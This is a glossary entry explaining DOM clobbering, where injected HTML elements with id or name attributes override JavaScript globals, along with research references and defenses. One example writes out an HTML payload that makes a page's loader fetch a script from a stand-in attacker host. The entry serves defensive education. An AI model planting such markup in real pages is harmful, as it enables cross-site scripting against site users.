DOM Clobbering
What is DOM Clobbering?
DOM ClobberingA browser-side technique in which attacker-controlled HTML elements with `id` or `name` attributes shadow global JavaScript variables, turning seemingly harmless markup into a vector for XSS, CSP bypass, and gadget chaining.
DOM clobbering exploits a legacy DOM feature: any HTML element with an id or name attribute is exposed as a property on window (and, for form fields, on its parent form). An attacker who can inject limited HTML — say through a markdown renderer or a relaxed sanitizer — can therefore create variables that override or define globals, even with all script tags blocked. Classic targets include window.config, library globals such as _wpemojiSettings, and properties a strict CSP otherwise protects. Modern research (Khodayari & Pellegrino, Heyes, and the 2023 attacks on widely used sanitizers like DOMPurify) demonstrated reliable gadget chains turning HTML-only injection into full XSS by hijacking framework lookups (window.config.url, document.currentScript.src). Defenses include using document.getElementById instead of bare global lookups, accessing globals via let/const, locking sensitive properties on window, and configuring sanitizers to strip or namespace id/name attributes on user-controlled HTML.
● Examples
- 01
A markdown comment containing `<a id=config><a id=config name=url href=//evil>` causes the page's loader to fetch a script from evil.tld.
- 02
A 2023 DOMPurify advisory adds `id` and `name` attributes to the sanitizer's strip-list to defeat known DOM-clobbering gadget chains.
● Frequently asked questions
What is DOM Clobbering?
A browser-side technique in which attacker-controlled HTML elements with `id` or `name` attributes shadow global JavaScript variables, turning seemingly harmless markup into a vector for XSS, CSP bypass, and gadget chaining. It belongs to the Application Security category of cybersecurity.
What does DOM Clobbering mean?
A browser-side technique in which attacker-controlled HTML elements with `id` or `name` attributes shadow global JavaScript variables, turning seemingly harmless markup into a vector for XSS, CSP bypass, and gadget chaining.
How do you defend against DOM Clobbering?
Defences for DOM Clobbering typically combine technical controls and operational practices, as detailed in the full definition above.
What are other names for DOM Clobbering?
Common alternative names include: HTML namespace pollution, Named-element global hijack.